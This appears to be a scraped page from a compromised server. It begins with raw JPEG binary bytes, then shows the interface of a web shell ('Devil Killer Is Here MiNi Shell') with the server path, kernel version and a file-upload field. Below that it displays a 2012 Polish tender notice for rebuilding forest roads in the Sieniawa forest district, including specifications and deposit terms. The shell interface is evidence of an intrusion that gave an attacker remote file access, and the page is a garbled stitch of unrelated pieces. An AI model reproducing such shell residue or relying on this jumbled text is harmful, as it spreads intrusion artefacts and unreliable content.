JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120803/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120803/284506-N-2012.html

<p class="kh_header"><b>Sieniawa: Przebudowa dróg leśnych Nr 52 A, B; Nr 61 A, B; Nr 46 w Nadleśnictwie Sieniawa</b><br>
<b>Numer ogłoszenia: 284506 - 2012; data zamieszczenia: 03.08.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Nadleśnictwo Sieniawa , ul. Kościuszki 11, 37-530 Sieniawa, woj. podkarpackie, tel. 016 6227965, faks 016 6227965.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.sieniawa.krosno.lasy.gov.pl/</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Państwowa jednostka organizacyjna nie posiadająca osobowości prawnej..</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa dróg leśnych Nr 52 A, B; Nr 61 A, B; Nr 46 w Nadleśnictwie Sieniawa.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest: 
A)	Część 1: 
Przebudowa drogi leśnej Nr 52 A i B w km 0+000 - 5+627  stanowiącej dojazd do kompleksów leśnych Leśnictwa Czerce i Czerwona Wola w Nadleśnictwie Sieniawa. 
Zamierzenie budowlane składa się z następujących obiektów:
- trasy zasadniczej drogi leśnej,
- mijanek,
- zjazdów,
- rowów przydrożnych,
- przepustów pod koroną drogi i zjazdami z umocnieniami wlotów i wylotów.
Wszelkie roboty drogowe zostaną wykonane w pasie istniejącej drogi oraz na terenach własnych Lasów Państwowych - Nadleśnictwa Sieniawa.

Teren:
Trasa projektowanej drogi leśnej rozpoczyna się od pasa drogowego drogi wojewódzkiej (DW) Nr 867 relacji Sieniawa - Oleszyce (zjazd z drogi asfaltowej wojewódzkiej km 8+956) na granicy m. Dobra i Mołodycz km 0+000 biegnąc w kierunku zachodnim, zaś koniec w km 5+627 - Leśnictwo Czerwona Wola kończąc się na drodze leśnej.
Zgodnie z wykonanym rozpoznaniem geologicznym wierzchnią warstwę drogi stanowi nasyp niekontrolowany (nN) o miąższości 0,5 - 0,8 m oraz do 3,0 m piaski drobne (Pd) średnio zagęszczone. Woda gruntowa kształtuje się na poziomie 0,6 - 1,5 m.

Droga:
Odcinek drogi leśnej nr 52A, B biegnie śladem istniejącej drogi leśnej, która w chwili obecnej posiada nawierzchnię gruntową ulepszoną kruszywem lub tylko nawierzchnię gruntową. Szerokość istniejącej korony drogi waha się od 4 - 5 m, z poboczami gruntowymi 2 x 0.50 - 0,75 m z obustronnymi rowami (częściowo zamulonymi i zarośniętymi samosiewami). Pochylenie skarp i przeciwskarp 1:1 - 1:1,5. Droga przekracza istniejące cieki wodne lub lokalne zaniżenia gdzie znajdują się przepusty wymagające odmulenia lub przebudowy.

Przyjęto następujące parametry techniczne dla projektowanej drogi:
- Klasa drogi: wewnętrzna zamknięta - przekrój drogowy,
- Prędkość projektowa: Vp=30 km/h,
- Szerokość pasa ruchu: 3.50 m,
- Spadek jednostronny 2%
- Ilość pasów ruchu: 1 z mijankami,
- Szer. jezdni w rejonie mijanki: 6,00 m,
- Obustronne pobocza: 2 x 0,75 m,
- Dopuszczalny nacisk na oś: 100 kN/oś
- Odwodnienie dróg: powierzchniowe rowami przydrożnymi,
- Przepusty z rur HDPE: średnica 50 i 60 cm,
- Przepust z rury stalowej HELCOR HCPA-04 z obustronnymi półkami dla zwierząt,
- Promienie wyokrąglające łuki 11,0 m na zjazdach.
Konstrukcja nawierzchni: 
- Km 0+000 - 0+970, km 1+020 - 1+750, km 1+825 - 3+290, km 3+340 - 4+670, km 4+800 - 5+627:
- 5 cm warstwa ścieralna z mieszanki mineralno asfaltowej AC11S,
- 15 cm warstwa podbudowy z mieszanki niezwiązanej 0/31,5,
- 15 cm warstwa z mieszanki niezwiązanej 0/31,5 w podłożu ulepszonym,
- ------ geowłóknina separacyjna,
35 cm razem

- Km 0+970 - 1+020, km* 1+750 - 1+825*, km 3+290 - 3+340, km 4+670,00 - 4+800,00:
- 5 cm warstwa ścieralna z mieszanki mineralno asfaltowej AC11S,
- 15 cm warstwa podbudowy z mieszanki niezwiązanej0/31,5,
- 15 cm warstwa z mieszanki niezwiązanej w podłożu ulepszonym 0/31,5,
- 15 cm wzmocnienie podłoża geosyntetykiem komórkowym wypełnionym kruszywem,
- ------ geowłóknina separacyjna,
50 cm razem
*na wybranych odcinkach projektowane jest wzmocnienie podłoża geosyntetykiem.

Odwodnienie:
Odwodnienie powierzchniowe rowami ziemnymi. W ciągu omawianego odcinka na ciekach wodnych i lokalnych zaniżeniach zlokalizowane są przepusty, na których przewiduje się wykonanie następujących robót:
- Odmulenie:
- Km 0+497 - O50 L=8 m przewidywana obudowa wlotu i wylotu kamieniem łamanym na
zaprawie cementowo-piaskowej,
- Km 0+790 - O60 L=6 m przewidywana obudowa wlotu i wylotu kamieniem łamanym na
zaprawie cementowo-piaskowej,
- Km 0+820 - O80 L=6,5 m przewidywana obudowa wlotu i wylotu kamieniem łamanym na
zaprawie cementowo-piaskowej,
- Km 1+561 - O60 ze ściankami czołowymi L=6,8 m przewidywane wykonanie żelbetowej płyty
zespalającej istniejącego rurociągu,
- Przebudowa:
- Km 2+303 - istniejący przepust od mnicha HDPE O 50 L=6,0 m pozostaje b/z, przewidywana
obudowa wylotu kamieniem łamanym na zaprawie cementowo-piaskowej,
- Km 2+545 - istniejący przepust z rury stalowej O 30 L=8,0m do likwidacji (rozbiórki),
- Budowa:
- Km 0+087 - przepust z rur HDPE O50 L=17 m wraz z obudową wlotu i wylotu kamieniem
łamanym na zaprawie cementowo-piaskowej, istniejący przepust O50 L=6,5 m do rozbiórki,
- Km 1+780 - przepust z rur HDPE O60 L=12 m wraz z obudową wlotu i wylotu kamieniem
łamanym na zaprawie cementowo-piaskowej,
- Km 1+962 - przepust z rur HDPE O60 L=8 m wraz z obudową wlotu i wylotu kamieniem
łamanym na zaprawie cementowo-piaskowej,
- Km 2+314 - przepust z blachy falistej o przekroju owalnym typ HELCOR HCPA-04
z obustronnymi półkami dla zwierząt szer. 0,5 m, istniejący przepust z HDPE O60 L=8,0m do
rozbiórki,
- Km 2+563 - przepust z rur HDPE O60 L=8 m wraz z obudową wlotu i wylotu kamieniem
łamanym na zaprawie cementowo-piaskowej, istniejący przepust O50 L=3,5 m do rozbiórki,
- Km 2+860 - przepust z rur HDPE O40 L=8 m wraz z obudową wlotu i wylotu kamieniem
łamanym na zaprawie cementowo-piaskowej, istniejący przepust O40 L=4,7 m do rozbiórki,
- Km 3+005 - przepust z rur HDPE O50 L=8 m wraz z obudową wlotu i wylotu kamieniem
łamanym na zaprawie cementowo-piaskowej, istniejący przepust O50 L=4,0 m do rozbiórki,
- Km 3+280 - przepust z rur HDPE O50 L=8 m wraz z obudową wlotu i wylotu kamieniem
łamanym na zaprawie cementowo-piaskowej, istniejący przepust O50 L=4,5 m do rozbiórki,
- Km 4+786 - przepust z rur HDPE O60 L=8 m wraz z obudową wlotu i wylotu kamieniem
łamanym na zaprawie cementowo-piaskowej,
- Km 5+091 - przepust z rur HDPE O60 L=8 m wraz z obudową wlotu i wylotu kamieniem
łamanym na zaprawie cementowo-piaskowej, istniejący przepust O60 L=5 m do rozbiórki,
- Km 5+544 - przepust z rur HDPE O60 L=12 m wraz z obudową wlotu i wylotu kamieniem
łamanym na zaprawie cementowo-piaskowej.

Roboty ziemne:
Trasę drogi leśnej nr 52A,B poprowadzono śladem drogi z wykorzystaniem istniejącego korpusu - zakres
robót ziemnych ograniczy się jedynie do uzupełnienia poboczy gruntowych, robót na zjazdach, miejscowego poszerzenia korony drogi i poszerzenia korpusu drogowego pod mijanki.

Zjazdy:
W celu zapewnienia dojazdu do przyległych terenów leśnych należy wykonać zjazdy zgodnie z Planem sytuacyjnym oraz rysunkiem szczegółowym Schematy mijanek, poszerzeń i zjazdów, poprzez wykonanie nawierzchni tłuczniowej i przepustów na rowach z obudową wlotu i wylotu kamieniem łamanym na zaprawie cementowo-piaskowej.

Urządzenia infrastruktury technicznej:
Inwestycja nie wymaga przebudowy urządzeń infrastruktury technicznej.

B)	Część 2:
Przebudowa drogi leśnej Nr 61 A i B w km 0+000 - 6+737  stanowiącej dojazd do kompleksów leśnych Leśnictwa Czerce i Czerwona Wola w Nadleśnictwie Sieniawa. 
Zamierzenie budowlane składa się z następujących obiektów:
- trasy zasadniczej drogi leśnej,
- mijanek,
- zjazdów,
- rowów przydrożnych,
- przepustów pod koroną drogi i zjazdami z umocnieniami wlotów i wylotów.
Wszelkie roboty drogowe zostaną wykonane w pasie istniejącej drogi oraz na terenach własnych Lasów Państwowych - Nadleśnictwa Sieniawa.

Teren:
Trasa projektowanej drogi leśnej rozpoczyna się na drodze leśnej rejon Leśniczówki Czerce km 0+000 i biegnie w kierunku południowo-wschodnim, zaś koniec w km 6+737 - Leśnictwo Czerwona Wola kończąc się na drodze gminnej.
Zgodnie z wykonanym rozpoznaniem geologicznym wierzchnią warstwę drogi stanowi nasyp niekontrolowany (nN) o miąższości 0,3 - 0,8 m oraz do 3,0 m piaski drobne (Pd) średnio zagęszczone. Woda gruntowa kształtuje się na poziomie 1,0 - 1,5 m.

Droga:
Odcinek drogi leśnej nr 61A, B biegnie śladem istniejącej drogi leśnej na początkowym odcinku posiada
nawierzchnie tłuczniową z powierzchniowym zamknięciem zaś na pozostałym odcinku nawierzchnię gruntową ulepszoną kruszywem lub tylko nawierzchnię gruntową. Korona istniejącej drogi waha się od 4 - 5 m, z poboczami gruntowymi 2 x 0.50 - 0,75 m z obustronnymi rowami (częściowo zamulonymi i zarośniętymi samosiewami). Pochylenie skarp i przeciwskarp 1:1 - 1:1,5. Droga przekracza istniejące cieki wodne lub lokalne zaniżenia gdzie znajdują się przepusty wymagające odmulenia lub przebudowy.

Przyjęto następujące parametry techniczne dla projektowanej drogi:
- Klasa drogi: wewnętrzna zamknięta - przekrój drogowy,
- Prędkość projektowa: Vp=30 km/h,
- Szerokość pasa ruchu: 3.50 m,
- Spadek jednostronny 2%
- Ilość pasów ruchu: 1 z mijankami,
- Szer. jezdni w rejonie mijanki: 6,00 m,
- Obustronne pobocza: 2 x 0,75 m,
- Dopuszczalny nacisk na oś: 100 kN/oś
- Odwodnienie dróg: powierzchniowe rowami przydrożnymi,
- Przepusty z rur HDPE: średnica 50 i 60 cm,
- Promienie wyokrąglające łuki 11,0 m na zjazdach,
- Roboty konserwacyjne na rowach.
Konstrukcja nawierzchni: 
- Km 0+000 - 0+838:
- 4 cm warstwa ścieralna z mieszanki mineralno asfaltowej AC11S,
- 3 cm warstwa wyrównawcza z mieszanki mineralno asfaltowej AC11S,
7 cm razem

- Km 0+838 - 1+700, km 2+000 - 2+860, km 3+450 - 6+200, km 6+400 - 6+737,00:
- 5 cm warstwa ścieralna z mieszanki mineralno asfaltowej  AC11S,
- 15 cm warstwa podbudowy z mieszanki niezwiązanej 0/31,5,
- 15 cm warstwa z mieszanki niezwiązanej w podłożu ulepszonym,
- ------ geowłóknina separacyjna,
35 cm razem
Km 6+200 - 6+400
- 5 cm warstwa ścieralna z mieszanki mineralno asfaltowej AC11S,
- 15 cm warstwa podbudowy z mieszanki niezwiązanej 0/31,5,
- 15 cm warstwa z mieszanki niezwiązanej w podłożu ulepszonym,
- 15 cm wzmocnienie podłoża geosyntetykiem komórkowym wypełnionym kruszywem
- ------ geowłóknina separacyjna,
50 cm razem

W rejonie mijanek oraz na zjazdach należy wykonać nawierzchnię z tłucznia kamiennego.
W ciągu projektowanego odcinka występują istniejące skrzyżowania w km 0+000 (PPO), km 2+148
(z drogą Nr 52), km 3+690 (z tzw. kolejką) oraz km 6+737 (KPO).

Odwodnienie:
Odwodnienie powierzchniowe rowami ziemnymi. W ciągu omawianego odcinka na ciekach wodnych i lokalnych zaniżeniach zlokalizowane są przepusty, na których przewiduje się wykonanie następujących robót:
- Odmulenie:
- Km 0+111 - O60 ze ściankami czołowymi L=7 m,
- Km 1+878 - O80 ze ściankami czołowymi L=8 m - przewidywane obustronne umocnienie skarp kamieniem łamanym na zaprawie cementowo-piaskowej (powyżej ścianek czołowych),
- Km 2+279 - O40 L=8 m - przewidywana obudowa wlotu i wylotu kamieniem łamanym na zaprawie cementowo-piaskowej,
- Km 3+199 - O60 L=8 m - przewidywana obudowa wlotu i wylotu kamieniem łamanym na zaprawie cementowo-piaskowej,
- Km 3+720 - O60 z ściankami czołowymi L=8 m,
- Km 4+122 - O80 z ściankami czołowymi L=6 m,
- Km 4+843 - O60 z ściankami czołowymi L=6,5 m,
- Km 5+470 - O50 z ściankami czołowymi L=7 m,
- Km 5+667 - O50 L=6 m - przewidywana obudowa wlotu i wylotu kamieniem łamanym na zaprawie cementowo-piaskowej.
- Przebudowa:
- Km 4+722 - 2O150 z ściankami czołowymi L=10 m - przewidywane odkopanie wraz z wykonaniem (uszczelnieniem) styków oraz remontem ścianek czołowych (uzupełnienie ubytków).
- Budowa:
- Km 6+490 - przepust z rur HDPE O40 L=8 m wraz z obudową wlotu i wylotu kamieniem łamanym na zaprawie cementowo-piaskowej.

Roboty ziemne:
Trasę drogi leśnej nr 61A,B poprowadzono śladem drogi z wykorzystaniem istniejącego korpusu - zakres
robót ziemnych ograniczy się jedynie do uzupełnienia poboczy gruntowych, robót na zjazdach, miejscowego poszerzenia korony drogi i poszerzenia korpusu drogowego pod mijanki.

Zjazdy:
W celu zapewnienia dojazdu do przyległych terenów leśnych należy wykonać zjazdy zgodnie z Planem sytuacyjnym oraz rysunkiem szczegółowym Schematy mijanek, poszerzeń i zjazdów, poprzez wykonanie nawierzchni tłuczniowej i przepustów na rowach z obudową wlotu i wylotu kamieniem łamanym na zaprawie cementowo-piaskowej.

Urządzenia infrastruktury technicznej:
Inwestycja nie wymaga przebudowy urządzeń infrastruktury technicznej.



C)	Część 3:
Przebudowa drogi leśnej Nr 46 w km 0+000 - 8+200 w Nadleśnictwie Sieniawa, Leśnictwo Chrapy.   

Zakres prac objętych zamówieniem:
- odmulenie istniejących przepustów i naprawa uszkodzonych elementów,
- odmulenie i pogłębienie istniejących rowów odwadniających lub w razie potrzeby
wykonanie nowych z zachowaniem spadków umożliwiających odprowadzenie wody poza
pas drogowy do istniejącej sieci rowów,
- oczyszczenie skarp, poboczy i dna rowów z istniejących zarośli,
- oczyszczenie mechaniczne istniejącej nawierzchni,
- wykonanie mijanek, zjazdów oraz składów w miejscach uzgodnionych z Inwestorem,
- profilowanie nawierzchni i skarp rowów,
- wykonanie nasypów na poszerzeniach drogi wraz z zagęszczeniem,
- wykonanie podbudowy i nawierzchni zgodnie z przyjętą technologią

Droga:
Przedmiotowa droga nr 46 w całości przebiega gruntami leśnymi Skarbu Państwa w zarządzie PGL LP Nadleśnictwa Sieniawa i jest środkiem trwałym Nadleśnictwa. Znajduje się ona na terenie -Lasów Sieniawskich- w Specjalnym Obszarze Ochrony Siedlisk Natura 2000 PLH 180054.
Ze względu na istniejący stan techniczny droga nr 46 składa się z trzech odcinków. Odcinek 1 od km 0+000 do km 0+600 oraz odcinek 3 od km 6+355 do km 8+200 są w dużo gorszym stanie technicznym ze względu na słabą podbudowę. Odcinek nr 2 od km 0+600 do km 6+355 nie wymaga wymiany podbudowy, lecz tylko jej wzmocnienia przed wykonaniem nawierzchni drogi.
Warunki gruntowo-wodne.
Na podstawie przeprowadzonych badań geologicznych stwierdzono występowanie pod warstwą humusu grubości ok. 20 cm w ok. 70% piasków drobnych zaliczanych do 3 kategorii, o nośności G1 a w ok. 30% glin pylastych i pyłów piaszczystych, czyli średnio urabialnych kategorii 4 z grupą G4, wymagających dostosowania do G1. Woda gruntowa waha się w przedziale 1-2m poniżej poziomu terenu. Warunki wodne są przeciętne.

Przyjęto następujące parametry techniczne dla projektowanej drogi:
- prędkość projektowa - 30 km/h
- szerokość pasa drogowego około - 7,0-9,0m
- szerokość korony - 5,0 m
- szerokość jezdni - 3,5 m
- spadek poprzeczny: jednostronny: jezdni 3 %, poboczy 6 %,
- szerokość poboczy - 0,75 m
- na łukach poziomych o R<300m zastosować przechyłki o spadkach 3%
- na łukach poziomych o R<250m zastosować poszerzenia od 0,3m do 1,70m
- przy poszerzeniach na łuku zastosować proste przejściowe o dł. 25m
Przebieg trasy i niweleta drogi zostanie zachowany w dotychczasowym kształcie z wprowadzeniem korekt dotyczących dostosowania do parametrów normatywnych.

Konstrukcja nawierzchni:
- Km 0+000 - 0+600 ; km 6+355 - 8+200:
-	3cm -warstwa ścieralna z asfaltobetonu grysowego
-	4cm -warstwa wiążąca z asfaltobetonu żwirowego
-	15cm -tłuczeń 4-63mm zagęszczony mechanicznie
-	20cm -warstwa kruszywa naturalnego po zagęszczeniu warstwami
podłoże doprowadzone do nośności 100MPa [G1]
[geowłóknina min.200mg/m2,min.40kN/m + geokrata gr.10cm-30% powierzchni]
42 cm razem

- Km 0+600 - 6+355:
-	3cm -warstwa ścieralna z asfaltobetonu grysowego
-	4cm -warstwa wiążąca z asfaltobetonu żwirowego
-	15 cm-tłuczeń 4/63mm zagęszczony mechanicznie
-	profilowana i zagęszczona istniejąca nawierzchnia z kruszywa kamiennego
22 cm razem

Nawierzchnie tłuczniowe mijanek przewiduje się dodatkowo utrwalić poprzez podwójne powierzchniowe utrwalenie  emulsją asfaltową.

Odwodnienie:
Odwodnienie nawierzchni zostanie zapewnione poprzez spadki podłużne i poprzeczne jezdni do rowów. Rowy winny mieć głębokość nie mniejszą od 30 cm licząc od nawierzchni. Skarpy rowów trójkątnych winny mieć nachylenie 1 : 1,5. Woda z rowów odprowadzana będzie do istniejących rowów na terenie leśnym. Zniszczone umocnienia na wlotach przepustów będą uzupełnione lub wymienione na nowe. Dna i skarpy wlotów i wylotów przepustów zostaną umocnione brukiem kamiennym. Wszystkie roboty związane z odwodnieniem nie wpłyną na zmianę stosunków wodnych.

Roboty ziemne:
Roboty ziemne będą polegały na usunięciu mas ziemnych z rowów przydrożnych i skarp, w miejscach poszerzeń, mijanek oraz zawyżeń terenu.

Zjazdy:
Projektuje się 20 mijanek zlokalizowanych najczęściej przy zjazdach. Zjazdy nr 28, 29 ulepszyć nawierzchnią bitumiczną i wykonać przy nich łuki o promieniu 11m. Pozostałe zjazdy i mijanki wykonać na podbudowie z pospółki gr. 20cm i nawierzchni tłuczniowej gr. 15cm dwukrotnie powierzchniowo utrwalonej emulsją asfaltową. Skład w km 8+150m z pospółki gr. 20cm na profilowanym i zagęszczonym podłożu gruntowym.

Urządzenia infrastruktury technicznej:
Inwestycja nie wymaga przebudowy urządzeń infrastruktury technicznej.

Zamówienie realizowane jest z podziałem na części. Szczegółowy opis przedmiotu zamówienia i rozwiązania techniczne przebudowy dróg leśnych Nr 52A,B, 61A,B i 46 zawarte są w Dokumentacjach projektowych na które składają się: projekty wykonawcze, Specyfikacje Techniczne Wykonania i Odbioru Robót, Przedmiary robót i dokumentacje geotechniczne (stanowiące załączniki nr 10 do SIWZ) oraz kosztorysy ofertowe  stanowiące załączniki  nr 2a; 2b i 2c do SIWZ.
Wymienione powyżej opracowania stanowią integralną część SIWZ, a wszystkie wskazane w nich, poprzez zamieszczenie znaków towarowych, patentów lub pochodzenia, materiały (wyroby) i urządzenia należy rozumieć jako określenie wymaganych parametrów technicznych lub standardów jakościowych. Oznacza to, że zgodnie z art. 29 ustawy, w odniesieniu do materiałów (wyrobów) i urządzeń wskazanych z nazwy Zamawiający dopuszcza zastosowanie materiałów (wyrobów), tj. o jakości nie gorszej niż opisana w Dokumentacji projektowej oraz Specyfikacjach technicznych wykonania i odbioru robót budowlanych (STWiORB)..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający w stosunku do przedmiotu zamówienia określonego w pkt. III niniejszej SIWZ przewiduje możliwość udzielenia zamówień uzupełniających o których mowa w art. 67 ust. 1 pkt. 6 ustawy Pzp., w wysokości do 50 % wartości zamówienia podstawowego.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.23.32.20-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający żąda wniesienia wadium w następującej wysokości:
-	dla części 1: 10 000,00 zł. (słownie: dziesięć tysięcy złotych),
-	dla części 2: 10 000,00 zł. (słownie: dziesięć tysięcy złotych), 
-	dla części 3: 15 000,00 zł. (słownie: piętnaście tysięcy złotych).
Wadium należy wnieść  przed upływem terminu składania ofert (art. 45 ust. 2,3 i 4 Ustawy).

Wadium może być wniesione w jednej lub kilku następujących formach:
1)	pieniądzu,
2)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo- kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
3)	gwarancjach bankowych,
4)	gwarancjach ubezpieczeniowych,
5)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust.5 pkt2 Ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. nr 109, poz. 1158 z późn. zm.), art. 45 ust.6 Ustawy.
Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy Zamawiającego w: 
Bank Spółdzielczy w Rzeszowie o. Sieniawa, nr konta bankowego: 70 9162 1010 2003 1500 0345 0001 z dopiskiem na blankiecie przelewu jakiego postępowania dotyczy. (art. 45 ust.7 Ustawy): Wadium w postępowaniu na roboty budowlane - nr postępowania NS/IZ/1/2012.

Wadium wnoszone w formach, o których mowa w pkt. 12.2 ppkt. 2-5 SIWZ, należy złożyć w formie oryginału w kasie Zamawiającego.

Gwarancja musi być podpisana przez upoważnionego (upełnomocnionego) przedstawiciela gwaranta. Podpis winien być sporządzony w sposób umożliwiający jego identyfikację, np. złożony wraz z imienną pieczątką lub czytelny (z podaniem imienia i nazwiska). Z treści gwarancji winno wynikać bezwarunkowe, na każde pisemne żądanie zgłoszone przez Zamawiającego w terminie związania ofertą, zobowiązanie gwaranta do wypłaty Zamawiającemu pełnej kwoty wadium w okolicznościach określonych w art. 46 ust. 4a i ust. 5 Ustawy.

Wniesienie wadium w pieniądzu będzie skuteczne, jeżeli w podanym terminie składania ofert znajdzie się na rachunku bankowym Zamawiającego, tj. do dnia 14.08.2012 r. do godz. 10.00.

Wykonawca, który nie wniesie wadium w terminie składania ofert w jednej z form, o których mowa w pkt. 12.2., zostanie wykluczony z postępowania, a jego oferta zostanie uznana za odrzuconą (art. 24 ust. 2 pkt. 2, art. 24 ust. 4 Ustawy).

Na podstawie art. 46 Ustawy, Zamawiający zwróci wadium:
1)	wszystkim wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem wykonawcy, którego oferta została wybrana jako najkorzystniejsza, z zastrzeżeniem art. 46 ust. 4a Ustawy,
